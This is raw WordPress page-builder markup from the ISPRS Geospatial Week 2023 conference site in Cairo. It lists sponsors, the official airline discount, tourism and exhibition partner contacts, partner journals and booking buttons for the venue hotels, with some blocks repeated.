wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button 